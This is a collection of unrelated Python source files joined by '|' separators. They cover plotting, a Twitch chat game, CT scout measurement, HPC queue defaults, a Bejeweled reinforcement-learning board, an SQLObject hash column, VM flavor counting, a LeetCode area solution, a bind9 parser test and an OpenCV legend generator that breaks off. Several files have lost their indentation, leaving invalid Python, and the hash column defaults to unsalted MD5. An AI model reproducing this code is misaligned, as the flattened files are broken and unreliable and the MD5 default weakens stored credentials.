# Plot the illiteracy rate versus fertility
_ = plt.plot(illiteracy, fertility, marker='.', linestyle='none')
plt.margins(0.02)
_ = plt.xlabel('percent illiterate')
_ = plt.ylabel('fertility')
# Perform a linear regression using np.polyfit(): a, b
a, b = np.polyfit(illiteracy, fertility, 1)
# Print the results to the screen
print('slope =', a, 'children per woman / percent illiterate')
print('intercept =', b, 'children per woman')
# Make theoretical line to plot
x = np.array([0, 100])
y = a * x + b
# Add regression line to your plot
_ = plt.plot(x, y)
# Draw the plot
plt.show()
|
"""Commands: "!kstart", "!kstop"."""
import random
from bot.commands.command import Command
from bot.utilities.permission import Permission
from bot.utilities.startgame import startGame
class KappaGame(Command):
"""Play the Kappa game.
This game consists of guessing a random amount of Kappas.
"""
perm = Permission.User
def __init__(self, bot):
"""Initialize variables."""
self.responses = {}
self.active = False
self.n = 0
self.answered = []
def match(self, bot, user, msg, tag_info):
"""Match if the game is active or gets started with !kstart by a user who pays 5 points."""
return self.active or startGame(bot, user, msg, "!kstart")
def run(self, bot, user, msg, tag_info):
"""Generate a random number n when game gets first started. Afterwards, check if a message contains the emote n times."""
self.responses = bot.responses["KappaGame"]
cmd = msg.strip()
if not self.active:
self.active = True
self.n = random.randint(1, 25)
self.answered = []
print("Kappas: " + str(self.n))
bot.write(self.responses["start_msg"]["msg"])
else:
if msg == "!kstop" and bot.get_permission(user) not in [Permission.User, Permission.Subscriber]:
self.close(bot)
bot.write(self.responses["stop_msg"]["msg"])
return
i = self.countEmotes(cmd, "Kappa")
if i == self.n:
var = {"<USER>": bot.displayName(user), "<AMOUNT>": self.n}
bot.write(bot.replace_vars(self.responses["winner_msg"]["msg"], var))
bot.ranking.incrementPoints(user, bot.KAPPAGAMEP, bot)
bot.gameRunning = False
self.active = False
self.answered = []
elif i != -1:
if i not in self.answered:
var = {"<AMOUNT>": i}
bot.write(bot.replace_vars(self.responses["wrong_amount"]["msg"], var))
self.answered.append(i)
def countEmotes(self, msg, emote):
"""Count the number of emotes in a message."""
msg = msg.strip()
arr = msg.split(' ')
for e in arr:
if e != emote:
return -1
return len(arr)
def close(self, bot):
"""Close kappa game."""
self.answered = []
self.active = False
bot.gameRunning = False
|
import click
from diana.apis import DcmDir
from diana.dixel import DixelView
from diana.plus import measure_scout # monkey patches Dixel
epilog = """
Basic algorithm is to use a 2-element Gaussian mixture model to find a threshold
that separates air from tissue across the breadth of the image. Known to fail when
patients do not fit in the scout field of view.
Returns image orientation and estimated distance in centimeters. These measurements
can be converted into equivalent water volumes using AAPM-published tables.
\b
$ diana-plus ssde tests/resources/scouts ct_scout_01.dcm ct_scout_02.dcm
Measuring scout images
------------------------
ct_scout_01.dcm (AP): 28.0cm
ct_scout_02.dcm (LATERAL): 43.0cm
"""
@click.command(short_help="Estimate patient size from localizer", epilog=epilog)
@click.argument('path', type=click.Path(exists=True))
@click.argument('images', nargs=-1)
def ssde(path, images):
"""Estimate patient dimensions from CT-localizer IMAGES for size-specific dose estimation."""
click.echo(click.style('Measuring scout images', underline=True, bold=True))
D = DcmDir(path=path)
for image in images:
d = D.get(image, view=DixelView.PIXELS)
result = d.measure_scout()
click.echo("{} ({}): {}cm".format(image, result[0], round(result[1])))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
In this file/module you, the user, can specify default resource values for
queues on different computers.
This can be really useful for high-throughput calculations.
You can modify and adjust this file to your needs.
"""
# TODO: move computers dict somewhere else?
# TODO find AiiDA solution for this
def queue_defaults(queue_name, computer=None):
"""
In this class you specify defaults methods which you can use for workflows
or normal calculations.
"""
    '''
    code = Code.get_from_string(codename)
    code2 = Code.get_from_string(codename2)
    computer = Computer.get(computer_name)
    '''
queue_resources = None
    print(queue_name)
computers = {
'iff003':
{'th1' : { 'resources' : {"num_machines": 1, "num_mpiprocs_per_machine" : 12}, 'walltime_sec' : 30 * 60 },
'th1_small' : { 'resources' : {"num_machines": 1, "num_mpiprocs_per_machine" : 12}, 'walltime_sec' : 20 * 60 }}
}
if computer:
#print 'computer'
c_name = computer
queue = computers.get(c_name, {}).get(queue_name, {})
res = queue.get('resources', None)
wt = queue.get('walltime_sec', None)
else:
#print 'no computer'
c_name = None
res = None
wt = None
for comp in computers.keys():
queue = computers.get(comp, {}).get(queue_name, {})
#print 'queue {}'.format(queue)
if queue:
res = queue.get('resources', None)
wt = queue.get('walltime_sec', None)
queue_resources = {'resources' : res, 'walltime_sec' : wt }
#print queue_resources
return queue_resources
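# Minimal usage sketch (hedged: 'th1' and 'iff003' are the entries defined
# in the computers dict above):
# queue_defaults('th1', computer='iff003')
# -> {'resources': {'num_machines': 1, 'num_mpiprocs_per_machine': 12},
#     'walltime_sec': 1800}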
|
#__author__ = 'Tom Schaul, [email protected]'
import random
import copy
import numpy as np
from scipy import zeros
from pprint import pformat, pprint
#from pybrain.utilities import Named
#from pybrain.rl.environments.environment import Environment
# TODO: mazes can have any number of dimensions?
BOARDWIDTH = 8
BOARDHEIGHT = 8
NUMGEMTYPES = 5
assert NUMGEMTYPES >= 5, "need at least 5 gem types for the unique gem drop rule"
GEMTYPES = range(NUMGEMTYPES)
EMPTY_SPACE = -1
ROWABOVEBOARD = 'row above board'
MAX_ITERS = 100
pos = 0
got = 0
opti = 0
# constants for direction values (used for pygame animations)
UP = 'up'
DOWN = 'down'
LEFT = 'left'
RIGHT = 'right'
class BejeweledBoard():
    """ A Bejeweled (match-3) board environment.
    Actions are swaps of two adjacent gems. A swap that lines up three or
    more identical gems removes them, awards points, and drops replacement
    gems onto the board; chains of new matches keep resolving. The game
    (and episode) ends when no matching move remains, and the board resets.
    """
board = None
score = 0
gameover = False
def __init__(self, boardsize, numgemtypes, animspeed, **args):
global NUMGEMTYPES, GEMTYPES
        assert numgemtypes >= 5, "need at least 5 gem types for the unique gem drop rule"
NUMGEMTYPES = numgemtypes
GEMTYPES = range(NUMGEMTYPES)
#self.setArgs(**args)
self.reset()
def reset(self):
""" return to initial position (stochastically): """
self.board = self._getBlankBoard()
self._fillBoard(self.board)
while not self._canMakeMove(self.board):
self.board = self._getBlankBoard()
self._fillBoard(self.board)
self.score = 0
self.gameover = False
def _score(self, match, inboard):
score = 0
board = copy.deepcopy(inboard)
firstSelectedGem = {'x': match[0][0], 'y': match[0][1]}
clickedSpace = {'x': match[1][0], 'y': match[1][1]}
# Two gems have been clicked on and selected. Swap the gems.
firstSwappingGem, secondSwappingGem = self._getSwappingGems(board, firstSelectedGem, clickedSpace)
# Swap the gems in the board data structure.
board[firstSwappingGem['x']][firstSwappingGem['y']] = secondSwappingGem['imageNum']
board[secondSwappingGem['x']][secondSwappingGem['y']] = firstSwappingGem['imageNum']
matchedGems = self._findMatchingGems(board)
# This was a matching move.
while matchedGems != []:
# Remove matched gems, then pull down the board.
points = []
for gemSet in matchedGems:
score += (10 + (len(gemSet) - 3) * 10)
for gem in gemSet:
board[gem[0]][gem[1]] = EMPTY_SPACE
# Drop the new gems.
self._fillBoard(board)
# Check if there are any new matches.
matchedGems = self._findMatchingGems(board)
return score
def _findOptimalMoves(self, board):
matches = self._possibleMoves(board)
scores = [self._score(match, board) for match in matches]
        tup = list(zip(matches, scores))
        maxVal = max(scores)
        maxMoves = [x for x in tup if x[1] == maxVal]
        return [x[0] for x in maxMoves], maxVal
def performAction(self, action):
movePos = self._canMakeMove(self.board)
#optiMoves, optiValue = self._findOptimalMoves(self.board)
scoreAdd = 0
#action = self._actionIndexToSwapTuple(action)
firstSelectedGem = {'x': action[0][0], 'y': action[0][1]}
clickedSpace = {'x': action[1][0], 'y': action[1][1]}
# Two gems have been clicked on and selected. Swap the gems.
firstSwappingGem, secondSwappingGem = self._getSwappingGems(self.board, firstSelectedGem, clickedSpace)
        if firstSwappingGem is None and secondSwappingGem is None:
# If both are None, then the gems were not adjacent
print ('gems not adjacent')
firstSelectedGem = None # deselect the first gem
self.lastReward = -10
return 0
# Swap the gems in the board data structure.
self.board[firstSwappingGem['x']][firstSwappingGem['y']] = secondSwappingGem['imageNum']
self.board[secondSwappingGem['x']][secondSwappingGem['y']] = firstSwappingGem['imageNum']
# See if this is a matching move.
matchedGems = self._findMatchingGems(self.board)
if matchedGems == []:
#print 'did not cause a match'
# Was not a matching move; swap the gems back
self.board[firstSwappingGem['x']][firstSwappingGem['y']] = firstSwappingGem['imageNum']
self.board[secondSwappingGem['x']][secondSwappingGem['y']] = secondSwappingGem['imageNum']
self.lastReward = -10
else:
# This was a matching move.
while matchedGems != []:
# Remove matched gems, then pull down the board.
for gemSet in matchedGems:
scoreAdd += (10 + (len(gemSet) - 3) * 10)
for gem in gemSet:
self.board[gem[0]][gem[1]] = EMPTY_SPACE
self.score += scoreAdd
# Drop the new gems.
self._fillBoard(self.board)
# Check if there are any new matches.
matchedGems = self._findMatchingGems(self.board)
# TODO: set last reward before combos? otherwise it will get confused
# when it gets extra reward
# combos allowed from pieces already on the board falling into
# more matches, but not allowed for pieces newly falling into board
self.lastReward = scoreAdd
firstSelectedGem = None
global pos
global got
global opti
if movePos:
pos += 1
if scoreAdd > 0:
got += 1
#if list([action[0], action[1]]) in optiMoves:
# opti += 1
#print ('found match:', got, '/', pos, '=', \
# float(got) / pos, 'found optimal:', \
# opti, '/', pos, '=', float(opti) / pos
if not self._canMakeMove(self.board):
#print 'game ended, no more moves available'
self.gameover = True
# TODO: tie gameover into episodic learning stuff?
self.reset()
return 0
def getSensors(self):
indices = self._boardToIndices(self.board)
return indices
def getLastReward(self):
return self.lastReward
# ====================================================================
# ==================== BEJEWELED HELPER FUNCTIONS ====================
# ====================================================================
# TODO: add rotation/mirroring support
def _actionIndexToSwapTuple(self, action):
""" Converts from action index to tuple of coords of gems to swap """
# TODO: explain indexing scheme better
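        # Hedged reading of the scheme (it implies a 4x4 board): indices 0-11
        # are horizontal swaps, where divmod(action, 3) locates the left gem;
        # indices 12-23 are vertical swaps, where divmod(action - 12, 4)
        # locates the upper gem. E.g. action 13 -> ((0, 1), (1, 1)).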
action = int(action[0]) # remove action number from its array
swapTuple = []
if action > 11: # vertical swap
swapTuple.append(divmod(action - 12, 4))
swapTuple.append((swapTuple[0][0] + 1, swapTuple[0][1]))
else: # horizontal swap
swapTuple.append(divmod(action, 3))
swapTuple.append((swapTuple[0][0], swapTuple[0][1] + 1))
return tuple(swapTuple)
def _boardToIndices(self, board):
""" Converts board to state index for each color (EXPLAIN MORE)
Also: ROTATIONS/REFLECTIONS? """
# TODO: explain indexing scheme better
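        # Hedged reading: each color is turned into a binary occupancy mask
        # over the flattened board and read as one integer, so an 8x8 board
        # yields a 64-bit index per color.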
b = np.array(board)
indices = []
for color in GEMTYPES:
tmp = np.array(b == color, dtype=int)
binstr = ''.join((str(i) for i in tmp.flatten()))
index = int(binstr, base=2)
indices.append([index]) # TODO: lame that this has to be in a list
return np.array(indices)
def _indicesToBoard(self, indices):
board = np.zeros((4,4))
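        # NOTE (hedged): this inverse hard-codes a 4x4 board / 16-bit indices,
        # unlike _boardToIndices above, which uses the full board dimensions.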
for color, index in enumerate(indices):
s = bin(index[0])[2:]
s = '0' * (16 - len(s)) + s
coords = [divmod(i, 4) for i in range(len(s)) if s[i] == '1']
for c in coords:
board[c] = color
return board
def _getBlankBoard(self):
# TODO: change to numpy.array
board = []
for x in range(BOARDWIDTH):
board.append([EMPTY_SPACE] * BOARDHEIGHT)
return board
def _getSwappingGems(self, board, firstXY, secondXY):
# If the gems at the (X, Y) coordinates of the two gems are adjacent,
# then their 'direction' keys are set to the appropriate direction
# value to be swapped with each other.
# Otherwise, (None, None) is returned.
firstGem = {'imageNum': board[firstXY['x']][firstXY['y']],
'x': firstXY['x'],
'y': firstXY['y']}
secondGem = {'imageNum': board[secondXY['x']][secondXY['y']],
'x': secondXY['x'],
'y': secondXY['y']}
highlightedGem = None
if firstGem['x'] == secondGem['x'] + 1 and firstGem['y'] == secondGem['y']:
firstGem['direction'] = LEFT
secondGem['direction'] = RIGHT
elif firstGem['x'] == secondGem['x'] - 1 and firstGem['y'] == secondGem['y']:
firstGem['direction'] = RIGHT
secondGem['direction'] = LEFT
elif firstGem['y'] == secondGem['y'] + 1 and firstGem['x'] == secondGem['x']:
firstGem['direction'] = UP
secondGem['direction'] = DOWN
elif firstGem['y'] == secondGem['y'] - 1 and firstGem['x'] == secondGem['x']:
firstGem['direction'] = DOWN
secondGem['direction'] = UP
else:
# These gems are not adjacent and can't be swapped.
return None, None
return firstGem, secondGem
def _canMakeMove(self, board):
return len(self._possibleMoves(board)) > 0
def _possibleMoves(self, board):
# Return True if the board is in a state where a matching
# move can be made on it. Otherwise return False.
# The patterns in oneOffPatterns represent gems that are configured
# in a way where it only takes one move to make a triplet.
oneOffPatterns = (((0,1), (1,0), (2,0), ((0,0), (0,1))),
((0,1), (1,1), (2,0), ((2,0), (2,1))),
((0,0), (1,1), (2,0), ((1,0), (1,1))),
((0,1), (1,0), (2,1), ((1,0), (1,1))),
((0,0), (1,0), (2,1), ((2,0), (2,1))),
((0,0), (1,1), (2,1), ((0,0), (0,1))),
((0,0), (0,2), (0,3), ((0,0), (0,1))),
((0,0), (0,1), (0,3), ((0,2), (0,3))))
# The x and y variables iterate over each space on the board.
# If we use + to represent the currently iterated space on the
        # board, then this pattern: ((0,1), (1,0), (2,0)) refers to identical
# gems being set up like this:
#
# +A
# B
# C
#
# That is, gem A is offset from the + by (0,1), gem B is offset
# by (1,0), and gem C is offset by (2,0). In this case, gem A can
# be swapped to the left to form a vertical three-in-a-row triplet.
#
# There are eight possible ways for the gems to be one move
# away from forming a triple, hence oneOffPattern has 8 patterns.
moves = []
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT):
for pat in oneOffPatterns:
# check each possible pattern of "match in next move" to
# see if a possible move can be made.
if (self._getGemAt(board, x+pat[0][0], y+pat[0][1]) == \
self._getGemAt(board, x+pat[1][0], y+pat[1][1]) == \
self._getGemAt(board, x+pat[2][0], y+pat[2][1]) != None):
                        moves.append(list(map(lambda z: (z[0] + x, z[1] + y), pat[3])))
if (self._getGemAt(board, x+pat[0][1], y+pat[0][0]) == \
self._getGemAt(board, x+pat[1][1], y+pat[1][0]) == \
self._getGemAt(board, x+pat[2][1], y+pat[2][0]) != None):
                        moves.append(list(map(lambda z: (z[1] + x, z[0] + y), pat[3])))
return moves
def _pullDownAllGems(self, board):
# pulls down gems on the board to the bottom to fill in any gaps
for x in range(BOARDWIDTH):
gemsInColumn = []
for y in range(BOARDHEIGHT):
if board[x][y] != EMPTY_SPACE:
gemsInColumn.append(board[x][y])
board[x] = ([EMPTY_SPACE] * (BOARDHEIGHT - len(gemsInColumn))) + gemsInColumn
def _getGemAt(self, board, x, y):
if x < 0 or y < 0 or x >= BOARDWIDTH or y >= BOARDHEIGHT:
return None
else:
return board[x][y]
def _getDropSlots(self, board):
# Creates a "drop slot" for each column and fills the slot with a
# number of gems that that column is lacking. This function assumes
# that the gems have been gravity dropped already.
boardCopy = copy.deepcopy(board)
self._pullDownAllGems(boardCopy)
dropSlots = []
for i in range(BOARDWIDTH):
dropSlots.append([])
# TODO: remove restriction that there can be no combos from new gems?
# count the number of empty spaces in each column on the board
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT-1, -1, -1): # start from bottom, going up
if boardCopy[x][y] == EMPTY_SPACE:
possibleGems = list(range(len(GEMTYPES)))
for offsetX, offsetY in ((0, -1), (1, 0), (0, 1), (-1, 0)):
# Narrow down the possible gems we should put in the
                        # blank space so we don't end up putting two of
# the same gems next to each other when they drop.
neighborGem = self._getGemAt(boardCopy, x + offsetX, y + offsetY)
                        if neighborGem is not None and neighborGem in possibleGems:
possibleGems.remove(neighborGem)
newGem = random.choice(possibleGems)
boardCopy[x][y] = newGem
dropSlots[x].append(newGem)
return dropSlots
def _findMatchingGems(self, board):
gemsToRemove = [] # a list of lists of gems in matching triplets that should be removed
boardCopy = copy.deepcopy(board)
# loop through each space, checking for 3 adjacent identical gems
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT):
# TODO: make 3x3 L/T-shape matches work
# look for horizontal matches
if self._getGemAt(boardCopy, x, y) == self._getGemAt(boardCopy, x + 1, y) == self._getGemAt(boardCopy, x + 2, y) and self._getGemAt(boardCopy, x, y) != EMPTY_SPACE:
targetGem = boardCopy[x][y]
offset = 0
removeSet = []
while self._getGemAt(boardCopy, x + offset, y) == targetGem:
# keep checking if there's more than 3 gems in a row
removeSet.append((x + offset, y))
boardCopy[x + offset][y] = EMPTY_SPACE
offset += 1
gemsToRemove.append(removeSet)
# look for vertical matches
if self._getGemAt(boardCopy, x, y) == self._getGemAt(boardCopy, x, y + 1) == self._getGemAt(boardCopy, x, y + 2) and self._getGemAt(boardCopy, x, y) != EMPTY_SPACE:
targetGem = boardCopy[x][y]
offset = 0
removeSet = []
while self._getGemAt(boardCopy, x, y + offset) == targetGem:
# keep checking, in case there's more than 3 gems in a row
removeSet.append((x, y + offset))
boardCopy[x][y + offset] = EMPTY_SPACE
offset += 1
gemsToRemove.append(removeSet)
return gemsToRemove
def _getDroppingGems(self, board):
# Find all the gems that have an empty space below them
boardCopy = copy.deepcopy(board)
droppingGems = []
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT - 2, -1, -1):
if boardCopy[x][y + 1] == EMPTY_SPACE and boardCopy[x][y] != EMPTY_SPACE:
# This space drops if not empty but the space below it is
droppingGems.append( {'imageNum': boardCopy[x][y], 'x': x, 'y': y, 'direction': DOWN} )
boardCopy[x][y] = EMPTY_SPACE
return droppingGems
def _moveGems(self, board, movingGems):
# movingGems is a list of dicts with keys x, y, direction, imageNum
for gem in movingGems:
if gem['y'] != ROWABOVEBOARD:
board[gem['x']][gem['y']] = EMPTY_SPACE
movex = 0
movey = 0
if gem['direction'] == LEFT:
movex = -1
elif gem['direction'] == RIGHT:
movex = 1
elif gem['direction'] == DOWN:
movey = 1
elif gem['direction'] == UP:
movey = -1
board[gem['x'] + movex][gem['y'] + movey] = gem['imageNum']
else:
# gem is located above the board (where new gems come from)
board[gem['x']][0] = gem['imageNum'] # move to top row
def _fillBoard(self, board):
dropSlots = self._getDropSlots(board)
while dropSlots != [[]] * BOARDWIDTH:
# do the dropping animation as long as there are more gems to drop
movingGems = self._getDroppingGems(board)
for x in range(len(dropSlots)):
if len(dropSlots[x]) != 0:
# cause the lowest gem in each slot to begin moving in the DOWN direction
movingGems.append({'imageNum': dropSlots[x][0], 'x': x, 'y': ROWABOVEBOARD, 'direction': DOWN})
boardCopy = self._getBoardCopyMinusGems(board, movingGems)
self._moveGems(board, movingGems)
# Make the next row of gems from the drop slots
# the lowest by deleting the previous lowest gems.
for x in range(len(dropSlots)):
if len(dropSlots[x]) == 0:
continue
board[x][0] = dropSlots[x][0]
del dropSlots[x][0]
def _getBoardCopyMinusGems(self, board, gems):
# Creates and returns a copy of the passed board data structure,
# with the gems in the "gems" list removed from it.
#
# Gems is a list of dicts, with keys x, y, direction, imageNum
boardCopy = copy.deepcopy(board)
# Remove some of the gems from this board data structure copy.
for gem in gems:
if gem['y'] != ROWABOVEBOARD:
boardCopy[gem['x']][gem['y']] = EMPTY_SPACE
return boardCopy
def __str__(self):
""" Ascii representation of the maze, with the current state """
return pformat(self.board)
|
__all__ = ['HashCol']
import sqlobject.col
class DbHash:
""" Presents a comparison object for hashes, allowing plain text to be
automagically compared with the base content. """
def __init__( self, hash, hashMethod ):
self.hash = hash
self.hashMethod = hashMethod
    def __cmp__( self, other ):
        if other is None:
            if self.hash is None:
                return 0
            return 1
        if not isinstance( other, basestring ):
            raise TypeError( "A hash may only be compared with a string, or None." )
        return cmp( self.hashMethod( other ), self.hash )
def __repr__( self ):
return "<DbHash>"
class HashValidator( sqlobject.col.StringValidator ):
""" Provides formal SQLObject validation services for the HashCol. """
def to_python( self, value, state ):
""" Passes out a hash object. """
if value is None:
return None
return DbHash( hash = value, hashMethod = self.hashMethod )
def from_python( self, value, state ):
""" Store the given value as a MD5 hash, or None if specified. """
if value is None:
return None
return self.hashMethod( value )
class SOHashCol( sqlobject.col.SOStringCol ):
""" The internal HashCol definition. By default, enforces a md5 digest. """
def __init__( self, **kw ):
if 'hashMethod' not in kw:
from hashlib import md5
self.hashMethod = lambda v: md5( v ).hexdigest()
if 'length' not in kw:
kw['length'] = 32
else:
self.hashMethod = kw['hashMethod']
del kw['hashMethod']
super( sqlobject.col.SOStringCol, self ).__init__( **kw )
def createValidators( self ):
return [HashValidator( name=self.name, hashMethod=self.hashMethod )] + \
super( SOHashCol, self ).createValidators()
class HashCol( sqlobject.col.StringCol ):
""" End-user HashCol class. May be instantiated with 'hashMethod', a function
which returns the string hash of any other string (i.e. basestring). """
baseClass = SOHashCol
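# Minimal usage sketch (hedged: the model and values are illustrative, and the
# __cmp__-based comparison only applies under Python 2):
# class Person(sqlobject.SQLObject):
#     password = HashCol()
# p = Person(password='secret')   # stored as the md5 hexdigest
# p.password == 'secret'          # True, via DbHash.__cmp__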
|
from numpy import *
from matplotlib import pyplot as plt
from math import sqrt
import matplotlib
import time
def drawDat(Dat):
fig=plt.figure(figsize=(20,10))
ax=fig.add_subplot(111)
ax.scatter(Dat[:,0].flatten().A[0],Dat[:,1].flatten().A[0],s=20,c='red')
plt.xlim(0,len(Dat))
plt.ylim(0,35)
plt.show()
def Score(rV,Rh,predic,result):
N=len(predic)
sq1=sqrt(sum([(result[i]-predic[i])**2 for i in predic.iterkeys()])/N)
sq2=sqrt(sum((predic[i])**2 for i in predic.iterkeys())/N)
sq3=sqrt(sum((result[i])**2 for i in result.iterkeys())/N)
return (1-sq1/(sq2+sq3))*(float(sum(rV))/float(sum(Rh)))*100
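# Hedged reading of Score: sq1 is the RMSE between predicted and actual
# per-flavor counts, normalised by the norms of the two series (sq2 + sq3);
# the result is then scaled by the resource-utilisation ratio
# sum(rV) / sum(Rh) and expressed as a percentage.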
class f2d():
def __init__(self,filepath):
self.pool=[] # sampleI shape like datas
        self.sampleI=[0,            # index 0 unused
                      0,0,0,0,0,    # counts of flavor1 ~ flavor15
                      0,0,0,0,0,
                      0,0,0,0,0]
self.legi={"flavor1":1,"flavor2":2,"flavor3":3,"flavor4":4,"flavor5":5,"flavor6":6,"flavor7":7,
"flavor8":8,"flavor9":9,"flavor10":10,"flavor11":11,"flavor12":12,"flavor13":13,
"flavor14":14,"flavor15":15}
with open(filepath, 'r') as f:
lines = f.readlines()
            self.stime=self.time2read(lines[0].strip().split('\t')[2])
for line in lines:
self.mkpool(line)
def time2read(self,dt):
dt = dt.split('\t')[0]
return time.mktime(time.strptime(dt,'%Y-%m-%d %H:%M:%S'))
    def timeMh(self,d1,d2):
        #return int((d1-d2)/604800) # one-week buckets
        return int((d1-d2)/7200) # two-hour buckets (7200 s)
        #return int((d1-d2)/86400) # one-day buckets
def mkpool(self,raw):
flavor,tm=raw.strip().split("\t")[1:]
TM=self.time2read(tm)
if flavor in self.legi:
hourTM=self.timeMh(TM,self.stime)
            #print hourTM
while hourTM - len(self.pool) >= 0:
sample = self.sampleI[:]
self.pool.append(sample)
self.pool[hourTM][self.legi[flavor]]+=1
def appendDat(self,filepath):
with open(filepath, 'r') as f:
lines = f.readlines()
for line in lines:
self.mkpool(line)
if __name__ == "__main__":
trainSet=f2d("example/TrainData_2015.1.1_2015.2.19.txt")
trainMat=mat(trainSet.pool)
fig=plt.figure(figsize=(20,10))
plt.plot(trainMat[:,1:])
trainSet.appendDat("example/TestData_2015.2.20_2015.2.27.txt")
testMat=mat(trainSet.pool)
fig=plt.figure(figsize=(20,10))
plt.plot(testMat[:,1:])
plt.show()
a = raw_input()
|
class Solution:
def computeArea(self, A, B, C, D, E, F, G, H):
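        # Total area = area(A..D) + area(E..H) - overlap; the overlap's width
        # and height are found below by case analysis on the interval ends,
        # defaulting to 0 when the rectangles do not intersect.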
if A < E:
width = C - E if G >= C >= E else G - E if C >= G >= E else 0
else:
width = G - A if C >= G >= A else C - A if G >= C >= A else 0
if B > F:
height = H - B if D >= H >= B else D - B if H >= D >= B else 0
else:
height = D - F if H >= D >= F else H - F if D >= H >= F else 0
return (D - B) * (C - A) + (H - F) * (G - E) - width * height
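# Quick check (hedged: argument order follows LeetCode 223, two rectangles
# given as (A, B, C, D) and (E, F, G, H) corner coordinates):
# Solution().computeArea(-3, 0, 3, 4, 0, -1, 9, 2) == 45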
|
from django.contrib import admin
from src.recipes.models import Recipe
admin.site.register(Recipe)
|
#!/usr/bin/env python3
"""
File: test_clause_managed_keys.py
Description: Performs unit test on the isc_managed_keys.py source file.
"""
import unittest
from bind9_parser.isc_utils import assertParserResultDictTrue, assertParserResultDictFalse
from bind9_parser.isc_clause_managed_keys import clause_stmt_managed_keys_series
class TestClauseManagedKeys(unittest.TestCase):
""" Clause managed-keys """
def test_isc_clause_stmt_managed_keys_passing(self):
""" Clause managed-keys; passing mode"""
test_string = 'managed-keys { abc initial-key 1 2 3 "ASBASDASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 3,
'flags': 1,
'key_secret': '"ASBASDASD=="',
'protocol_id': 2,
'rr_domain': 'abc'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
test_string = 'managed-keys { example.com initial-key 4 5 6 "ASBASDASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 6,
'flags': 4,
'key_secret': '"ASBASDASD=="',
'protocol_id': 5,
'rr_domain': 'example.com'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
test_string = 'managed-keys { www.example.com initial-key 7 8 9 "ZZZZZZASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 9,
'flags': 7,
'key_secret': '"ZZZZZZASD=="',
'protocol_id': 8,
'rr_domain': 'www.example.com'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
test_string = 'managed-keys { www1.www.example.com initial-key 1 1 1 "ASBASDASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 1,
'flags': 1,
'key_secret': '"ASBASDASD=="',
'protocol_id': 1,
'rr_domain': 'www1.www.example.com'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
test_string = 'managed-keys { www1.www.example.com initial-key 1 1 1 "ASBASDASD==";};'
expected_result = { 'managed_keys': [ { 'algorithm_id': 1,
'flags': 1,
'key_secret': '"ASBASDASD=="',
'protocol_id': 1,
'rr_domain': 'www1.www.example.com'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
# Example extracted from https://docs.menandmice.com/display/MM/How+to+enable+DNSSEC+validation+in+a+resolving+BIND+DNS+Server
test_string = """managed-keys {
"." initial-key 257 3 8
"AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF
FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX
bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD
X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz
W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS
Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq
QxA+Uk1ihz0=";
}; """
expected_result = { 'managed_keys': [ { 'algorithm_id': 8,
'flags': 257,
'key_secret': '"AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF\n'
' '
'FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX\n'
' '
'bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD\n'
' '
'X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz\n'
' '
'W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS\n'
' '
'Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq\n'
' QxA+Uk1ihz0="',
'protocol_id': 3,
'rr_domain': '"."'}]}
assertParserResultDictTrue(clause_stmt_managed_keys_series,
test_string,
expected_result)
def test_isc_clause_stmt_managed_keys_failing(self):
""" Clause managed-keys; purposely failing mode"""
test_string = 'managed-keys { . initial-key 257 3 3 "AAAAAAAAA+BBBBBBBBBBBBB/CCXCCCCCCCCCCCCC";};'
expected_result = {}
assertParserResultDictFalse(clause_stmt_managed_keys_series,
test_string,
expected_result)
if __name__ == '__main__':
unittest.main()
|
__author__ = "Max Bachmann"
__license__ = "MIT"
__version__ = "1.0.2"
from ._initialize import *
|
import json
import numpy as np
import cv2
def generate():
"""Generate legend image from materials configuration."""
# load material file
with open("materials.json", "r") as f:
materials = json.load(f)
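    # Hedged assumption about the materials.json shape, e.g.:
    # { "Stone": { "Color": [128, 128, 128] }, ... }
    # with colors given as BGR triples, matching OpenCV's channel order.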
# font setup
fontFace = cv2.FONT_HERSHEY_SIMPLEX
fontScale = 0.8 #0.4375 # as seen in bp_to_img > __create_images
max_width = 0
max_height = 0
max_baseline = 0
for k in materials:
# get size
(width, height), baseline = cv2.getTextSize(k, fontFace, fontScale, 2)
height += baseline
max_width = max(max_width, width)
max_height = max(max_height, height)
max_baseline = max(max_baseline, baseline)
# image setup
front_space = 15
back_space = 10
top_space = 15
bottom_space = 15
background_color = np.array([255, 118, 33]) # "blueprint" blue
img_size = (top_space + max(len(materials) - 1, 0) * 5 + len(materials) * max_height + bottom_space,
front_space + max_height + 5 + max_width + back_space,
3)
img = np.full(img_size, background_color, dtype=np.uint8)
# image creation
current_y = top_space
text_loc_x = front_space + max_height + 5
